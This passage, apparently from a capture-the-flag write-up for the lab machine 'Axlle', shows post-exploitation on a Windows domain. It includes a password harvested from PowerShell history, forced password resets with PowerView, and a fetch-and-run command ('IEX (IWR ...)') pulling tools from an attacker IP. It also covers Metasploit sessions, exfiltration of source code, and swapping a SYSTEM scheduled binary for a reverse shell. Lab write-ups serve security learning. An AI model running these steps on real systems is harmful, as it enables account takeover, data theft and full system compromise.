Authentication authority asserted identity Well-known group S-1-18-1                                      Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\Users\dallon.matrix>powershell
PS C:\> Get-ADGroup -Properties * -Identity 'Web Devs'

CanonicalName                   : axlle.htb/Users/Web Devs
CN                              : Web Devs
Created                         : 1/2/2024 5:42:37 AM
createTimeStamp                 : 1/2/2024 5:42:37 AM
Deleted                         :
Description                     : Web Wizards
DisplayName                     : Web Devs
DistinguishedName               : CN=Web Devs,CN=Users,DC=axlle,DC=htb
dSCorePropagationData           : {1/2/2024 6:33:15 AM, 1/2/2024 6:26:06 AM, 1/2/2024 6:02:13 AM, 12/31/1600 4:00:00 PM}
GroupCategory                   : Security
GroupScope                      : Global
groupType                       : -2147483646
HomePage                        :
instanceType                    : 4
isDeleted                       :
LastKnownParent                 :
ManagedBy                       :
member                          : {CN=Dallon Matrix,DC=axlle,DC=htb, CN=Calum Scott,DC=axlle,DC=htb, CN=Dan Kendo,DC=axlle,DC=htb, CN=Trent Langdon,DC=axlle,DC=htb}
MemberOf                        : {CN=Employees,CN=Users,DC=axlle,DC=htb}
Members                         : {CN=Dallon Matrix,DC=axlle,DC=htb, CN=Calum Scott,DC=axlle,DC=htb, CN=Dan Kendo,DC=axlle,DC=htb, CN=Trent Langdon,DC=axlle,DC=htb}
Modified                        : 1/2/2024 6:33:15 AM
modifyTimeStamp                 : 1/2/2024 6:33:15 AM
Name                            : Web Devs
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  : CN=Group,CN=Schema,CN=Configuration,DC=axlle,DC=htb
ObjectClass                     : group
ObjectGUID                      : 30b2b798-6b14-4019-9d49-63d72056520e
objectSid                       : S-1-5-21-1005535646-190407494-3473065389-1127
ProtectedFromAccidentalDeletion : False
SamAccountName                  : Web Devs
sAMAccountType                  : 268435456
sDRightsEffective               : 0
SID                             : S-1-5-21-1005535646-190407494-3473065389-1127
SIDHistory                      : {}
uSNChanged                      : 41228
uSNCreated                      : 41081
whenChanged                     : 1/2/2024 6:33:15 AM
whenCreated                     : 1/2/2024 5:42:37 AM

Access to C:\App Development is still denied to us.

Checking the powershell history reveals the password of user:

PS C:\Users\dallon.matrix\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> cat $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
$SecPassword = ConvertTo-SecureString 'PJsO1du$CVJ#D' -AsPlainText -Force;
$Cred = New-Object System.Management.Automation.PSCredential('dallon.matrix', $SecPassword);

Creds: dallon.matrix:PJsO1du$CVJ#D

Since we got credentials we can harvest information about DC with bloodhound

Refer to: [[Bloodhound]]

Writeup-3.png

Show all groups permissions: Select Group -> First Degree Object Control

Writeup-5.png

Looks like we can reset password of 2 users. jacob.greeny and baz.humphries

TheHackerRecipies: ForceChangePassword Docs: https://powersploit.readthedocs.io/en/latest/Recon/Set-DomainUserPassword/ Scripts https://github.com/PowerShellMafia/PowerSploit

└─$ cp /opt/PowerSploit/Recon/PowerView.ps1 .
---
PS C:\users\public> IEX (IWR 10.10.16.75/PowerView.ps1 -UseBasicParsing)
PS C:\users\public> $NewPassword = ConvertTo-SecureString 'Password123$' -AsPlainText -Force
PS C:\users\public> Set-DomainUserPassword -Identity 'jacob.greeny' -AccountPassword $NewPassword
PS C:\> iwr 10.10.16.75/RunasCs.exe -o \users\public\rc.exe
meterpreter > bg
msf6 exploit(multi/handler) > run -j
msf6 exploit(multi/handler) > sessions 40
meterpreter > shell
C:\>powershell
PS C:\> \users\public\rc.exe 'jacob.greeny' 'Password123$' \users\public\rev.exe
^C
meterpreter > bg
msf6 exploit(multi/handler) > sessions 41
meterpreter > getuid
Server username: AXLLE\jacob.greeny 
PS C:\Windows\system32> whoami /all

User Name          SID
================== =============================================
axlle\jacob.greeny S-1-5-21-1005535646-190407494-3473065389-1120

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users              Alias            S-1-5-32-559                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Group used for deny only
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
AXLLE\App Devs                             Group            S-1-5-21-1005535646-190407494-3473065389-1108 Mandatory group, Enabled by default, Enabled group
AXLLE\Employees                            Group            S-1-5-21-1005535646-190407494-3473065389-1103 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

We are part of App Devs and finally have access to C:\App Development:

PS C:\App Development> tree /f
C:.
+---kbfiltr
       kbfiltr.sln
       README.md
    +---exe
           kbftest.c
           kbftest.vcxproj
           kbftest.vcxproj.Filters
    +---sys
            kbfiltr.c
            kbfiltr.h
            kbfiltr.inx
            kbfiltr.rc
            kbfiltr.vcxproj
            kbfiltr.vcxproj.Filters
            public.h
            rawpdo.c

We have a README.md so let's check what project does:

PS C:\App Development\kbfiltr> cat readme.md
## Keyboard Translation Program
This is an application in development that uses a WDF kbfiltr as the basis for a translation program. The aim of this application is to allow users to program and simulate custom keyboard layouts for real or fictional languages.

### Features
- Create custom keyboard layouts for real or fictional languages.
- Simulate keyboard inputs using the custom layouts.
- Secret codes to switch between languages and logging output.

### Progress
- kbfiltr driver - Complete
- Keyboard mapping - Complete (hardcoded in driver)
- Custom mapping in application layer - In progress
- Logging - Complete
- Activation of logging - Complete
- Simulation of other keyboard layouts - Incomplete
- Activation of other keyboard layouts - Incomplete

**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**

### Prerequisites
- Windows 10 or higher
- Visual Studio 2019
- Windows Driver Kit (WDK) 10

### Getting Started
- Clone this repository.
- Open the solution file in Visual Studio.
- Build the solution in Release mode.
- Install the driver by running `.\devcon.exe install .\kbfiltr.inf "*PNP0303"` as Administrator.
- Install the driver as an upperclass filter with `.\devcon.exe /r classfilter keyboard upper -keylogger` as Administrator.
- Install the application by running the install_app.bat file as Administrator.
- Reboot your computer to load the driver.
- Launch the application and start programming your custom keyboard layouts.

### Usage
#### Programming a Custom Layout
- Launch the application.
- Click on the Program Layout button.
- Select the language for which you want to program the layout.
- Select the key you want to modify from the list.
- Modify the key's scancode and virtual key code as required.
- Repeat steps 4 and 5 for all the keys you want to modify.
- Save the layout by clicking on the Save Layout button.

#### Simulating Inputs
- Launch the application.
- Click on the Simulate Input button.
- Select the language for which you want to simulate the input.
- Type in the input in the normal English layout.
- Trigger language switch as outlined below (when required).
- Verify that the input is translated to the selected language.

#### Logging Output
- Launch the application.
- Turn on logging (shortcuts can be created as explained below)
- Use the application as normal.
- The log file will be created in the same directory as the application.

### Triggering/Activation
- To toggle logging output, set up a shortcut in the options menu. INCOMPLETE
- To switch to a different language, press the Left Alt key and the Right Ctrl key simultaneously. INCOMPLETE

### Bugs
There are probably several.

Zip the directory and download:

PS C:\App Development> & "C:\Program Files (x86)\hMailServer\Bin\7za.exe" a -tzip C:\Users\Public\app.zip .\kbfiltr
meterpreter > download C:\\Users\\Public\\app.zip

The source has nothing interesting, but the comment which developer left is. automated task = cronjob!

meterpreter > cd "C:\\Program Files (x86)\\Windows Kits\\10\\Testing\\StandaloneTesting\\Internal"
meterpreter > ls
Listing: C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal
==================================================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
040777/rwxrwxrwx  0      dir   2024-01-01 00:57:22 -0500  arm
040777/rwxrwxrwx  0      dir   2024-01-01 00:57:11 -0500  arm64
100777/rwxrwxrwx  71     fil   2023-09-13 21:28:22 -0400  run.bat
100666/rw-rw-rw-  15665  fil   2023-09-30 10:40:52 -0400  run.ps1
100777/rwxrwxrwx  73     fil   2023-09-13 21:28:22 -0400  setup.bat
100666/rw-rw-rw-  14762  fil   2023-09-30 10:41:00 -0400  setup.ps1
100666/rw-rw-rw-  21504  fil   2023-09-30 10:38:44 -0400  standaloneexport.dll
040777/rwxrwxrwx  4096   dir   2024-06-25 09:59:28 -0400  x64
040777/rwxrwxrwx  0      dir   2024-01-01 00:57:23 -0500  x86

It looks like we have 777 permission on the directory where binary lives, so since its a cronjob we can replace it with reverse shell and get system.

meterpreter > cd x64
meterpreter > cp standalonerunner.exe standalonerunner.exe.bak
meterpreter > cp C:\\Users\\Public\\rev.exe standalonerunner.exe
meterpreter > ls
Listing: C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64
======================================================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100777/rwxrwxrwx  7168   fil   2024-06-25 06:50:27 -0400  standalonerunner.exe
100666/rw-rw-rw-  33392  fil   2023-09-30 06:08:18 -0400  standalonerunner.exe.bak
100666/rw-rw-rw-  43632  fil   2023-09-30 06:08:26 -0400  standalonexml.dll

Privilege Escalation (Administrator)

So for whatever reason the msfvenom payload was not triggering, so I just decided to use Golang reverse shell.

Refer to [[Golang Reverse Shell]]

Root.txt

PS C:\users\Administrator> cat Desktop/root.txt
1909061be135bf5f98a16c62b9950436